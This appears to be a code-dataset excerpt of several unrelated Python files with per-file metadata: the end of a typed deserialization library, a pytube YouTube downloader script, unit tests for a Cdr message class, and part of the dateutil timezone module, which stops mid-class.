if not is_typing_type(class_reference) and issubclass(class_reference, enum.Enum):
try:
return finalize(class_reference(data))
# pylint:disable=bare-except
except:
enum_by_name = getattr(class_reference, str(data), None)
if enum_by_name:
return finalize(enum_by_name)
# pylint:enable=bare-except
# This will be handled at the end
pass
# If we still have a type from the typing module, we don't know how to
# handle it
if is_typing_type(class_reference):
# The data should not be None if we have a type that got here. Optionals
# are handled by unions above, so if we are here, it's a non-optional
# type and therefore should not be None.
if data is None:
raise DeserializeException(
f"No value for '{debug_name}'. Expected value of type '{class_reference}'"
)
raise DeserializeException(
f"Unsupported deserialization type: {class_reference} for {debug_name}"
)
# Whatever we have left now is either correct, or invalid
if isinstance(data, class_reference):
return finalize(data)
raise DeserializeException(
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}'"
)
# pylint:enable=too-many-return-statements
def _deserialize_list(
class_reference,
list_data,
debug_name,
*,
throw_on_unhandled: bool,
raw_storage_mode: RawStorageMode,
):
if not isinstance(list_data, list):
raise DeserializeException(
f"Cannot deserialize '{type(list_data)}' as a list for {debug_name}."
)
if not is_list(class_reference):
raise DeserializeException(
f"Cannot deserialize a list to '{class_reference}' for {debug_name}"
)
list_content_type_value = list_content_type(class_reference, debug_name)
output = []
for index, item in enumerate(list_data):
deserialized = _deserialize(
list_content_type_value,
item,
f"{debug_name}[{index}]",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
output.append(deserialized)
return output
def _deserialize_dict(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize a dictionary to a Python object."""
# Check if we are doing a straightforward dictionary parse first, or if it
# has to be deserialized
remaining_properties = set(data.keys())
if not isinstance(data, dict):
raise DeserializeException(
f"Data was not dict for instance: {class_reference} for {debug_name}"
)
if is_dict(class_reference):
if class_reference is dict:
# If types of dictionary entries are not defined, do not deserialize
return data
key_type, value_type = dict_content_types(class_reference, debug_name)
result = {}
for dict_key, dict_value in data.items():
if key_type != Any and not isinstance(dict_key, key_type):
raise DeserializeException(
f"Could not deserialize key {dict_key} to type {key_type} for {debug_name}"
)
result[dict_key] = _deserialize(
value_type,
dict_value,
f"{debug_name}.{dict_key}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
remaining_properties.remove(dict_key)
if throw_on_unhandled and len(remaining_properties) > 0:
raise UnhandledFieldException(
f"The following field was unhandled: {list(remaining_properties)[0]} for {debug_name}"
)
return result
# It wasn't a straight forward dictionary, so we are in deserialize mode
class_instance = None
class_reference_downcast_field = _get_downcast_field(class_reference)
if class_reference_downcast_field:
downcast_value = data[class_reference_downcast_field]
new_reference = _get_downcast_class(class_reference, downcast_value)
if new_reference is None:
if _allows_downcast_fallback(class_reference):
return _deserialize(
Dict[Any, Any],
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
raise UndefinedDowncastException(
f"Could not find subclass of {class_reference} with downcast identifier '{downcast_value}' for {debug_name}"
)
class_reference = new_reference
class_instance = class_reference.__new__(class_reference)
handled_fields = set()
hints = typing.get_type_hints(class_reference)
if len(hints) == 0:
raise DeserializeException(
f"Could not deserialize {data} into {class_reference} due to lack of type hints ({debug_name})"
)
for attribute_name, attribute_type in hints.items():
if _should_ignore(class_reference, attribute_name):
continue
property_key = _get_key(class_reference, attribute_name)
parser_function = _get_parser(class_reference, property_key)
if is_classvar(attribute_type):
if property_key in data:
raise DeserializeException(
f"ClassVars cannot be set: {debug_name}.{attribute_name}"
)
continue
if _uses_auto_snake(class_reference) and attribute_name.lower() != attribute_name:
raise DeserializeException(
f"When using auto_snake, all properties must be snake cased. Error on: {debug_name}.{attribute_name}"
)
using_default = False
if property_key in data:
value = data[property_key]
handled_fields.add(property_key)
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and camel_case(property_key) in data:
value = data[camel_case(property_key)]
handled_fields.add(camel_case(property_key))
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and pascal_case(property_key) in data:
value = data[pascal_case(property_key)]
handled_fields.add(pascal_case(property_key))
property_value = parser_function(value)
else:
if _has_default(class_reference, attribute_name):
deserialized_value = _get_default(class_reference, attribute_name)
using_default = True
else:
if not is_union(attribute_type) or type(None) not in union_types(
attribute_type, debug_name
):
raise DeserializeException(
f"Unexpected missing value for: {debug_name}.{attribute_name}"
)
property_value = parser_function(None)
if not using_default:
deserialized_value = _deserialize(
attribute_type,
property_value,
f"{debug_name}.{attribute_name}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
setattr(class_instance, attribute_name, deserialized_value)
unhandled = set(data.keys()) - handled_fields
if throw_on_unhandled and len(unhandled) > 0:
filtered_unhandled = [
key for key in unhandled if not _should_allow_unhandled(class_reference, key)
]
if len(filtered_unhandled) > 0:
raise UnhandledFieldException(
f"Unhandled field: {list(filtered_unhandled)[0]} for {debug_name}"
)
_call_constructed(class_reference, class_instance)
return class_instance
| 35.507143
| 148
| 0.644002
| 1,751
| 14,913
| 5.242147
| 0.173615
| 0.080837
| 0.03508
| 0.01961
| 0.266805
| 0.198279
| 0.136507
| 0.129971
| 0.124414
| 0.124414
| 0
| 0.000848
| 0.288004
| 14,913
| 419
| 149
| 35.591885
| 0.863628
| 0.189901
| 0
| 0.250896
| 0
| 0
| 0.115997
| 0.018425
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021505
| false
| 0.003584
| 0.053763
| 0
| 0.154122
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13356a393bf8946042480c6de66561dc06a9116f
| 3,796
|
py
|
Python
|
script.py
|
devppratik/Youtube-Downloader
|
ccdf31b83fbce2d05711c64dbad729c935c72b8a
|
[
"MIT"
] | null | null | null |
script.py
|
devppratik/Youtube-Downloader
|
ccdf31b83fbce2d05711c64dbad729c935c72b8a
|
[
"MIT"
] | null | null | null |
script.py
|
devppratik/Youtube-Downloader
|
ccdf31b83fbce2d05711c64dbad729c935c72b8a
|
[
"MIT"
] | null | null | null |
import os
import pyfiglet
from pytube import YouTube, Playlist
file_size = 0
folder_name = ""
# Progress Bar
def print_progress_bar(iteration, total, prefix='', suffix='', decimals=1, length=100, fill='#', print_end="\r"):
percent = ("{0:." + str(decimals) + "f}").format(100 *
(iteration / float(total)))
filled_length = int(length * iteration // total)
bar = fill * filled_length + '-' * (length - filled_length)
print(f'\r{prefix} |{bar}| {percent}% {suffix}', end=print_end)
if iteration == total:
print()
# Show Progress Bar
def show_progress_bar(chunk, file_handle, bytes_remaining):
print_progress_bar(file_size - bytes_remaining, file_size, prefix='Progress:', suffix='Complete', length=50)
return
# Get Download Location
def get_download_location():
if os.name == 'nt':
download_location = os.path.join(os.path.expanduser('~'), 'Downloads')
else:
download_location = os.path.join(
os.path.expanduser('~'), 'Downloads')
return download_location
# Get Desired Resolution
def get_resolution(video_url):
yt_obj = YouTube(video_url, on_progress_callback=show_progress_bar)
filters = yt_obj.streams.filter(progressive=True, file_extension='mp4')
print("\nAvailable Resolutions -")
for num, res in enumerate(filters, start=1):
print("\t{}. {}".format(num, str(res.resolution)))
selected_res = int(input('Please enter desired resolution : '))
filters = filters[selected_res - 1]
return filters
# Single Video Download
def download_video():
global file_size
try:
video_url = input('Provide Video Download Link : ')
filters = get_resolution(video_url)
file_size = int(filters.filesize)
download_location = get_download_location()
print("\nDownloading {}".format(str(filters.title)))
filters.download(output_path=download_location)
print("Video Downloaded. Thanks for using!!\nYou can find the video here - {}".format(download_location))
except Exception as e:
print("Some Error occured. Exception message is : ", e)
# Playlist Single Video Download
def download_playlist_video(video_url, res):
global file_size
yt_obj = YouTube(video_url, on_progress_callback=show_progress_bar)
filters = yt_obj.streams.filter(progressive=True, file_extension='mp4', resolution=res).first()
file_size = int(filters.filesize)
if not filters:
filters = yt_obj.streams.filter(
progressive=True, file_extension='mp4').first()
print("\nDownloading {}".format(str(filters.title)))
download_location = get_download_location()
filters.download(output_path="{}/{}".format(download_location, folder_name))
print("Download Complete")
# Playlist Download
def download_playlist():
global folder_name
try:
playlist_url = input('Provide Playlist Link : ')
videos_list = Playlist(playlist_url)
folder_name = videos_list.title
resolution = get_resolution(videos_list[0]).resolution
for video in videos_list:
download_playlist_video(video, resolution)
print("All Videos Downloaded. Thanks for Using!!")
except Exception as e:
print("Some Error occurred. Exception message is : ", e)
# Main Function
def main():
ascii_banner = pyfiglet.figlet_format("YT Downloader")
print(ascii_banner)
print("\t By Pratik Panda\n\n")
choice = int(input(
"""MENU
1.Download Single Video
2.Download Playlist\n
Enter Your Choice : """))
if choice == 1:
download_video()
elif choice == 2:
download_playlist()
else:
print("Wrong Option")
# Start of Program
if __name__ == '__main__':
main()
| 33.008696
| 113
| 0.670443
| 461
| 3,796
| 5.318872
| 0.284165
| 0.078303
| 0.02447
| 0.023246
| 0.284666
| 0.21044
| 0.179445
| 0.153344
| 0.153344
| 0.111746
| 0
| 0.007005
| 0.210221
| 3,796
| 114
| 114
| 33.298246
| 0.810874
| 0.046628
| 0
| 0.195122
| 0
| 0
| 0.148358
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0
| 0.036585
| 0
| 0.170732
| 0.195122
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13372002afbafad592f6b286397c1829136d9e66
| 1,547
|
py
|
Python
|
test/python/test.py
|
alex952/cdr
|
e8dce20c2cc635e5ad8bf16a16ec4f7d9a86ac16
|
[
"MIT"
] | null | null | null |
test/python/test.py
|
alex952/cdr
|
e8dce20c2cc635e5ad8bf16a16ec4f7d9a86ac16
|
[
"MIT"
] | null | null | null |
test/python/test.py
|
alex952/cdr
|
e8dce20c2cc635e5ad8bf16a16ec4f7d9a86ac16
|
[
"MIT"
] | null | null | null |
#
# Copyright 2014-2018 Neueda Ltd.
#
from cdr import Cdr
import unittest
field1 = 1
field2 = 2
field3 = 55
class TestCdr(unittest.TestCase):
def get_a_cdr(self):
d = Cdr()
d.setInteger(field1, 123)
d.setString(field2, "Hello")
d.setString(field3, "World")
return d
def test_set_integer(self):
d = self.get_a_cdr()
self.assertEqual(d.getInt32(field1), 123)
def test_set_string(self):
d = self.get_a_cdr()
d.setString(field2, "Hello")
self.assertEqual(d.getString(field2), "Hello")
def test_get_exception(self):
d = self.get_a_cdr()
with self.assertRaises(RuntimeError):
d.getInteger(4)
def test_to_string(self):
d = Cdr()
d.setInteger(field1, 123)
self.assertEqual(d.toString(), "1=123")
def test_str(self):
d = Cdr()
d.setInteger(field1, 123)
def test_nested(self):
d = Cdr()
e = Cdr()
e.setString(1, "hello")
e.setString(2, "world")
d.appendArray(1, e)
f = d.getArray(1)
self.assertEqual(e.getString(1), f[0].getString(1))
self.assertEqual(e.getString(2), f[0].getString(2))
def test_to_python_dict(self):
d = Cdr()
e = Cdr()
f = Cdr()
f[21] = 400
e[11] = 300
e[12] = [f]
d[1] = 100
d[2] = 200
d[3] = [e]
assert(d.toPythonDict()[3][0][12][0][21] == 400)
if __name__ == '__main__':
unittest.main()
| 20.355263
| 59
| 0.541694
| 208
| 1,547
| 3.889423
| 0.317308
| 0.049444
| 0.049444
| 0.033375
| 0.257108
| 0.163164
| 0.103832
| 0
| 0
| 0
| 0
| 0.078008
| 0.312217
| 1,547
| 75
| 60
| 20.626667
| 0.682331
| 0.020039
| 0
| 0.288462
| 0
| 0
| 0.028439
| 0
| 0
| 0
| 0
| 0
| 0.134615
| 1
| 0.153846
| false
| 0
| 0.038462
| 0
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1337486fb7ecdf7c5699a609f50b6301a5037cab
| 32,947
|
py
|
Python
|
vendor/mo_times/vendor/dateutil/tz.py
|
klahnakoski/auth0-api
|
eda9c2554c641da76687f64445b8d35543d012d9
|
[
"MIT"
] | null | null | null |
vendor/mo_times/vendor/dateutil/tz.py
|
klahnakoski/auth0-api
|
eda9c2554c641da76687f64445b8d35543d012d9
|
[
"MIT"
] | null | null | null |
vendor/mo_times/vendor/dateutil/tz.py
|
klahnakoski/auth0-api
|
eda9c2554c641da76687f64445b8d35543d012d9
|
[
"MIT"
] | null | null | null |
"""
Copyright (c) 2003-2007 Gustavo Niemeyer <gustavo@niemeyer.net>
This module offers extensions to the standard Python
datetime module.
"""
import datetime
import os
import struct
import sys
import time
from mo_future import PY3, string_types
__license__ = "Simplified BSD"
__all__ = ["tzutc", "tzoffset", "tzlocal", "tzfile", "tzrange",
"tzstr", "tzical", "tzwin", "tzwinlocal", "gettz"]
relativedelta = None
parser = None
rrule = None
try:
from dateutil.tzwin import tzwin, tzwinlocal
except (ImportError, OSError):
tzwin, tzwinlocal = None, None
def tzname_in_python2(myfunc):
"""Change unicode output into bytestrings in Python 2
tzname() API changed in Python 3. It used to return bytes, but was changed
to unicode strings
"""
def inner_func(*args, **kwargs):
if PY3:
return myfunc(*args, **kwargs)
else:
return myfunc(*args, **kwargs).encode()
return inner_func
ZERO = datetime.timedelta(0)
EPOCHORDINAL = datetime.datetime.utcfromtimestamp(0).toordinal()
class tzutc(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
def dst(self, dt):
return ZERO
@tzname_in_python2
def tzname(self, dt):
return "UTC"
def __eq__(self, other):
return (isinstance(other, tzutc) or
(isinstance(other, tzoffset) and other._offset == ZERO))
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s()" % self.__class__.__name__
__reduce__ = object.__reduce__
class tzoffset(datetime.tzinfo):
def __init__(self, name, offset):
self._name = name
self._offset = datetime.timedelta(seconds=offset)
def utcoffset(self, dt):
return self._offset
def dst(self, dt):
return ZERO
@tzname_in_python2
def tzname(self, dt):
return self._name
def __eq__(self, other):
return (isinstance(other, tzoffset) and
self._offset == other._offset)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%s, %s)" % (self.__class__.__name__,
repr(self._name),
self._offset.days*86400+self._offset.seconds)
__reduce__ = object.__reduce__
class tzlocal(datetime.tzinfo):
_std_offset = datetime.timedelta(seconds=-time.timezone)
if time.daylight:
_dst_offset = datetime.timedelta(seconds=-time.altzone)
else:
_dst_offset = _std_offset
def utcoffset(self, dt):
if self._isdst(dt):
return self._dst_offset
else:
return self._std_offset
def dst(self, dt):
if self._isdst(dt):
return self._dst_offset-self._std_offset
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
return time.tzname[self._isdst(dt)]
def _isdst(self, dt):
# We can't use mktime here. It is unstable when deciding if
# the hour near to a change is DST or not.
#
# timestamp = time.mktime((dt.year, dt.month, dt.day, dt.hour,
# dt.minute, dt.second, dt.weekday(), 0, -1))
# return time.localtime(timestamp).tm_isdst
#
# The code above yields the following result:
#
#>>> import tz, datetime
#>>> t = tz.tzlocal()
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRDT'
#>>> datetime.datetime(2003,2,16,0,tzinfo=t).tzname()
#'BRST'
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRST'
#>>> datetime.datetime(2003,2,15,22,tzinfo=t).tzname()
#'BRDT'
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRDT'
#
# Here is a more stable implementation:
#
timestamp = ((dt.toordinal() - EPOCHORDINAL) * 86400
+ dt.hour * 3600
+ dt.minute * 60
+ dt.second)
return time.localtime(timestamp+time.timezone).tm_isdst
def __eq__(self, other):
if not isinstance(other, tzlocal):
return False
return (self._std_offset == other._std_offset and
self._dst_offset == other._dst_offset)
return True
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s()" % self.__class__.__name__
__reduce__ = object.__reduce__
class _ttinfo(object):
__slots__ = ["offset", "delta", "isdst", "abbr", "isstd", "isgmt"]
def __init__(self):
for attr in self.__slots__:
setattr(self, attr, None)
def __repr__(self):
l = []
for attr in self.__slots__:
value = getattr(self, attr)
if value is not None:
l.append("%s=%s" % (attr, repr(value)))
return "%s(%s)" % (self.__class__.__name__, ", ".join(l))
def __eq__(self, other):
if not isinstance(other, _ttinfo):
return False
return (self.offset == other.offset and
self.delta == other.delta and
self.isdst == other.isdst and
self.abbr == other.abbr and
self.isstd == other.isstd and
self.isgmt == other.isgmt)
def __ne__(self, other):
return not self.__eq__(other)
def __getstate__(self):
state = {}
for name in self.__slots__:
state[name] = getattr(self, name, None)
return state
def __setstate__(self, state):
for name in self.__slots__:
if name in state:
setattr(self, name, state[name])
class tzfile(datetime.tzinfo):
# http://www.twinsun.com/tz/tz-link.htm
# ftp://ftp.iana.org/tz/tz*.tar.gz
def __init__(self, fileobj):
if isinstance(fileobj, string_types):
self._filename = fileobj
fileobj = open(fileobj, 'rb')
elif hasattr(fileobj, "name"):
self._filename = fileobj.name
else:
self._filename = repr(fileobj)
# From tzfile(5):
#
# The time zone information files used by tzset(3)
# begin with the magic characters "TZif" to identify
# them as time zone information files, followed by
# sixteen bytes reserved for future use, followed by
# six four-byte values of type long, written in a
# ``standard'' byte order (the high-order byte
# of the value is written first).
if fileobj.read(4).decode() != "TZif":
raise ValueError("magic not found")
fileobj.read(16)
(
# The number of UTC/local indicators stored in the file.
ttisgmtcnt,
# The number of standard/wall indicators stored in the file.
ttisstdcnt,
# The number of leap seconds for which data is
# stored in the file.
leapcnt,
# The number of "transition times" for which data
# is stored in the file.
timecnt,
# The number of "local time types" for which data
# is stored in the file (must not be zero).
typecnt,
# The number of characters of "time zone
# abbreviation strings" stored in the file.
charcnt,
) = struct.unpack(">6l", fileobj.read(24))
# The above header is followed by tzh_timecnt four-byte
# values of type long, sorted in ascending order.
# These values are written in ``standard'' byte order.
# Each is used as a transition time (as returned by
# time(2)) at which the rules for computing local time
# change.
if timecnt:
self._trans_list = struct.unpack(">%dl" % timecnt,
fileobj.read(timecnt*4))
else:
self._trans_list = []
# Next come tzh_timecnt one-byte values of type unsigned
# char; each one tells which of the different types of
# ``local time'' types described in the file is associated
# with the same-indexed transition time. These values
# serve as indices into an array of ttinfo structures that
# appears next in the file.
if timecnt:
self._trans_idx = struct.unpack(">%dB" % timecnt,
fileobj.read(timecnt))
else:
self._trans_idx = []
# Each ttinfo structure is written as a four-byte value
# for tt_gmtoff of type long, in a standard byte
# order, followed by a one-byte value for tt_isdst
# and a one-byte value for tt_abbrind. In each
# structure, tt_gmtoff gives the number of
# seconds to be added to UTC, tt_isdst tells whether
# tm_isdst should be set by localtime(3), and
# tt_abbrind serves as an index into the array of
# time zone abbreviation characters that follow the
# ttinfo structure(s) in the file.
ttinfo = []
for i in range(typecnt):
ttinfo.append(struct.unpack(">lbb", fileobj.read(6)))
abbr = fileobj.read(charcnt).decode()
# Then there are tzh_leapcnt pairs of four-byte
# values, written in standard byte order; the
# first value of each pair gives the time (as
# returned by time(2)) at which a leap second
# occurs; the second gives the total number of
# leap seconds to be applied after the given time.
# The pairs of values are sorted in ascending order
# by time.
# Not used, for now
if leapcnt:
leap = struct.unpack(">%dl" % (leapcnt*2),
fileobj.read(leapcnt*8))
# Then there are tzh_ttisstdcnt standard/wall
# indicators, each stored as a one-byte value;
# they tell whether the transition times associated
# with local time types were specified as standard
# time or wall clock time, and are used when
# a time zone file is used in handling POSIX-style
# time zone environment variables.
if ttisstdcnt:
isstd = struct.unpack(">%db" % ttisstdcnt,
fileobj.read(ttisstdcnt))
# Finally, there are tzh_ttisgmtcnt UTC/local
# indicators, each stored as a one-byte value;
# they tell whether the transition times associated
# with local time types were specified as UTC or
# local time, and are used when a time zone file
# is used in handling POSIX-style time zone envi-
# ronment variables.
if ttisgmtcnt:
isgmt = struct.unpack(">%db" % ttisgmtcnt,
fileobj.read(ttisgmtcnt))
# ** Everything has been read **
# Build ttinfo list
self._ttinfo_list = []
for i in range(typecnt):
gmtoff, isdst, abbrind = ttinfo[i]
# Round to full-minutes if that's not the case. Python's
# datetime doesn't accept sub-minute timezones. Check
# http://python.org/sf/1447945 for some information.
gmtoff = (gmtoff+30)//60*60
tti = _ttinfo()
tti.offset = gmtoff
tti.delta = datetime.timedelta(seconds=gmtoff)
tti.isdst = isdst
tti.abbr = abbr[abbrind:abbr.find('\x00', abbrind)]
tti.isstd = (ttisstdcnt > i and isstd[i] != 0)
tti.isgmt = (ttisgmtcnt > i and isgmt[i] != 0)
self._ttinfo_list.append(tti)
# Replace ttinfo indexes for ttinfo objects.
trans_idx = []
for idx in self._trans_idx:
trans_idx.append(self._ttinfo_list[idx])
self._trans_idx = tuple(trans_idx)
# Set standard, dst, and before ttinfos. before will be
# used when a given time is before any transitions,
# and will be set to the first non-dst ttinfo, or to
# the first dst, if all of them are dst.
self._ttinfo_std = None
self._ttinfo_dst = None
self._ttinfo_before = None
if self._ttinfo_list:
if not self._trans_list:
self._ttinfo_std = self._ttinfo_first = self._ttinfo_list[0]
else:
for i in range(timecnt-1, -1, -1):
tti = self._trans_idx[i]
if not self._ttinfo_std and not tti.isdst:
self._ttinfo_std = tti
elif not self._ttinfo_dst and tti.isdst:
self._ttinfo_dst = tti
if self._ttinfo_std and self._ttinfo_dst:
break
else:
if self._ttinfo_dst and not self._ttinfo_std:
self._ttinfo_std = self._ttinfo_dst
for tti in self._ttinfo_list:
if not tti.isdst:
self._ttinfo_before = tti
break
else:
self._ttinfo_before = self._ttinfo_list[0]
# Now fix transition times to become relative to wall time.
#
# I'm not sure about this. In my tests, the tz source file
# is setup to wall time, and in the binary file isstd and
# isgmt are off, so it should be in wall time. OTOH, it's
# always in gmt time. Let me know if you have comments
# about this.
laststdoffset = 0
self._trans_list = list(self._trans_list)
for i in range(len(self._trans_list)):
tti = self._trans_idx[i]
if not tti.isdst:
# This is std time.
self._trans_list[i] += tti.offset
laststdoffset = tti.offset
else:
# This is dst time. Convert to std.
self._trans_list[i] += laststdoffset
self._trans_list = tuple(self._trans_list)
def _find_ttinfo(self, dt, laststd=0):
timestamp = ((dt.toordinal() - EPOCHORDINAL) * 86400
+ dt.hour * 3600
+ dt.minute * 60
+ dt.second)
idx = 0
for trans in self._trans_list:
if timestamp < trans:
break
idx += 1
else:
return self._ttinfo_std
if idx == 0:
return self._ttinfo_before
if laststd:
while idx > 0:
tti = self._trans_idx[idx-1]
if not tti.isdst:
return tti
idx -= 1
else:
return self._ttinfo_std
else:
return self._trans_idx[idx-1]
def utcoffset(self, dt):
if not self._ttinfo_std:
return ZERO
return self._find_ttinfo(dt).delta
def dst(self, dt):
if not self._ttinfo_dst:
return ZERO
tti = self._find_ttinfo(dt)
if not tti.isdst:
return ZERO
# The documentation says that utcoffset()-dst() must
# be constant for every dt.
return tti.delta-self._find_ttinfo(dt, laststd=1).delta
# An alternative for that would be:
#
# return self._ttinfo_dst.offset-self._ttinfo_std.offset
#
# However, this class stores historical changes in the
# dst offset, so I belive that this wouldn't be the right
# way to implement this.
@tzname_in_python2
def tzname(self, dt):
if not self._ttinfo_std:
return None
return self._find_ttinfo(dt).abbr
def __eq__(self, other):
if not isinstance(other, tzfile):
return False
return (self._trans_list == other._trans_list and
self._trans_idx == other._trans_idx and
self._ttinfo_list == other._ttinfo_list)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._filename))
def __reduce__(self):
if not os.path.isfile(self._filename):
raise ValueError("Unpickable %s class" % self.__class__.__name__)
return (self.__class__, (self._filename,))
class tzrange(datetime.tzinfo):
def __init__(self, stdabbr, stdoffset=None,
dstabbr=None, dstoffset=None,
start=None, end=None):
global relativedelta
if not relativedelta:
from dateutil import relativedelta
self._std_abbr = stdabbr
self._dst_abbr = dstabbr
if stdoffset is not None:
self._std_offset = datetime.timedelta(seconds=stdoffset)
else:
self._std_offset = ZERO
if dstoffset is not None:
self._dst_offset = datetime.timedelta(seconds=dstoffset)
elif dstabbr and stdoffset is not None:
self._dst_offset = self._std_offset+datetime.timedelta(hours=+1)
else:
self._dst_offset = ZERO
if dstabbr and start is None:
self._start_delta = relativedelta.relativedelta(
hours=+2, month=4, day=1, weekday=relativedelta.SU(+1))
else:
self._start_delta = start
if dstabbr and end is None:
self._end_delta = relativedelta.relativedelta(
hours=+1, month=10, day=31, weekday=relativedelta.SU(-1))
else:
self._end_delta = end
def utcoffset(self, dt):
if self._isdst(dt):
return self._dst_offset
else:
return self._std_offset
def dst(self, dt):
if self._isdst(dt):
return self._dst_offset-self._std_offset
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
if self._isdst(dt):
return self._dst_abbr
else:
return self._std_abbr
def _isdst(self, dt):
if not self._start_delta:
return False
year = datetime.datetime(dt.year, 1, 1)
start = year+self._start_delta
end = year+self._end_delta
dt = dt.replace(tzinfo=None)
if start < end:
return dt >= start and dt < end
else:
return dt >= start or dt < end
def __eq__(self, other):
if not isinstance(other, tzrange):
return False
return (self._std_abbr == other._std_abbr and
self._dst_abbr == other._dst_abbr and
self._std_offset == other._std_offset and
self._dst_offset == other._dst_offset and
self._start_delta == other._start_delta and
self._end_delta == other._end_delta)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(...)" % self.__class__.__name__
__reduce__ = object.__reduce__
class tzstr(tzrange):
def __init__(self, s):
global parser
if not parser:
from dateutil import parser
self._s = s
res = parser._parsetz(s)
if res is None:
raise ValueError("unknown string format")
# Here we break the compatibility with the TZ variable handling.
# GMT-3 actually *means* the timezone -3.
if res.stdabbr in ("GMT", "UTC"):
res.stdoffset *= -1
# We must initialize it first, since _delta() needs
# _std_offset and _dst_offset set. Use False in start/end
# to avoid building it two times.
tzrange.__init__(self, res.stdabbr, res.stdoffset,
res.dstabbr, res.dstoffset,
start=False, end=False)
if not res.dstabbr:
self._start_delta = None
self._end_delta = None
else:
self._start_delta = self._delta(res.start)
if self._start_delta:
self._end_delta = self._delta(res.end, isend=1)
def _delta(self, x, isend=0):
kwargs = {}
if x.month is not None:
kwargs["month"] = x.month
if x.weekday is not None:
kwargs["weekday"] = relativedelta.weekday(x.weekday, x.week)
if x.week > 0:
kwargs["day"] = 1
else:
kwargs["day"] = 31
elif x.day:
kwargs["day"] = x.day
elif x.yday is not None:
kwargs["yearday"] = x.yday
elif x.jyday is not None:
kwargs["nlyearday"] = x.jyday
if not kwargs:
# Default is to start on first sunday of april, and end
# on last sunday of october.
if not isend:
kwargs["month"] = 4
kwargs["day"] = 1
kwargs["weekday"] = relativedelta.SU(+1)
else:
kwargs["month"] = 10
kwargs["day"] = 31
kwargs["weekday"] = relativedelta.SU(-1)
if x.time is not None:
kwargs["seconds"] = x.time
else:
# Default is 2AM.
kwargs["seconds"] = 7200
if isend:
# Convert to standard time, to follow the documented way
# of working with the extra hour. See the documentation
# of the tzinfo class.
delta = self._dst_offset-self._std_offset
kwargs["seconds"] -= delta.seconds+delta.days*86400
return relativedelta.relativedelta(**kwargs)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._s))
class _tzicalvtzcomp(object):
def __init__(self, tzoffsetfrom, tzoffsetto, isdst,
tzname=None, rrule=None):
self.tzoffsetfrom = datetime.timedelta(seconds=tzoffsetfrom)
self.tzoffsetto = datetime.timedelta(seconds=tzoffsetto)
self.tzoffsetdiff = self.tzoffsetto-self.tzoffsetfrom
self.isdst = isdst
self.tzname = tzname
self.rrule = rrule
class _tzicalvtz(datetime.tzinfo):
def __init__(self, tzid, comps=[]):
self._tzid = tzid
self._comps = comps
self._cachedate = []
self._cachecomp = []
def _find_comp(self, dt):
if len(self._comps) == 1:
return self._comps[0]
dt = dt.replace(tzinfo=None)
try:
return self._cachecomp[self._cachedate.index(dt)]
except ValueError:
pass
lastcomp = None
lastcompdt = None
for comp in self._comps:
if not comp.isdst:
# Handle the extra hour in DST -> STD
compdt = comp.rrule.before(dt-comp.tzoffsetdiff, inc=True)
else:
compdt = comp.rrule.before(dt, inc=True)
if compdt and (not lastcompdt or lastcompdt < compdt):
lastcompdt = compdt
lastcomp = comp
if not lastcomp:
# RFC says nothing about what to do when a given
# time is before the first onset date. We'll look for the
# first standard component, or the first component, if
# none is found.
for comp in self._comps:
if not comp.isdst:
lastcomp = comp
break
else:
lastcomp = comp[0]
self._cachedate.insert(0, dt)
self._cachecomp.insert(0, lastcomp)
if len(self._cachedate) > 10:
self._cachedate.pop()
self._cachecomp.pop()
return lastcomp
def utcoffset(self, dt):
return self._find_comp(dt).tzoffsetto
def dst(self, dt):
comp = self._find_comp(dt)
if comp.isdst:
return comp.tzoffsetdiff
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
return self._find_comp(dt).tzname
def __repr__(self):
return "<tzicalvtz %s>" % repr(self._tzid)
__reduce__ = object.__reduce__
class tzical(object):
def __init__(self, fileobj):
global rrule
if not rrule:
from dateutil import rrule
if isinstance(fileobj, string_types):
self._s = fileobj
fileobj = open(fileobj, 'r') # ical should be encoded in UTF-8 with CRLF
elif hasattr(fileobj, "name"):
self._s = fileobj.name
else:
self._s = repr(fileobj)
